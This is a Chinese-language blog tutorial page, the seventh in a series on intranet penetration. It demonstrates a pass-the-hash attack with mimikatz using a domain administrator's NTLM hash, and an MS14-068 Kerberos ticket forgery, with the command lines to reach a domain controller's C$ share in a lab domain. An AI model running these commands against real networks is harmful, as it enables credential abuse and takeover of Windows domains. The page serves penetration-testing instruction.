主页 > 网络知识 > 内网渗透实战技巧(7)

内网渗透实战技巧(7)

 

内网渗透实战技巧

 

哈希传递攻击

在域环境内,只有获得了域管理员的哈希才可以攻击。这里假设我们得到了域管理员administrator的哈希,但是没有得到明文密码。在这里我们就可以用哈希传递攻击了。

在前面获得了域管理员 administrator 的NTLM哈希为:c456c606a647ef44b646c44a227917a4

sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:c456c606a647ef44b646c44a227917a4

 

点击并拖拽以移动

内网渗透实战技巧

 

MS14-068

MS14-068漏洞适用于当我们获得了普通域用户的哈希,域控存在MS14-068漏洞的场景。我们现在想利用获得了普通域用户哈希去访问域控。

但是这里我们是直接获得了域管理员的哈希,这里只是演示下MS14-068漏洞的攻击手法

先获取需要利用的域用户的SID值

 

内网渗透实战技巧

 

#生成票据TGT_administrator@god.org.ccache MS14-068.exe -u administrator@god.org -p Password@ -s S-1-5-21-2952760202-1353902439-2381784089-500 -d 192.168.52.138       #MS14-068.exe -u 域用户@dog.org -p 域用户密码 -s 域用户的SID -d 域控ip #在mimikatz中导入票据 kerberos::ptc  TGT_administrator@god.org.ccache的路径 然后再打开一个cmd窗口尝试访问域控 dir \192.168.52.138c$

 

点击并拖拽以移动

内网渗透实战技巧

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!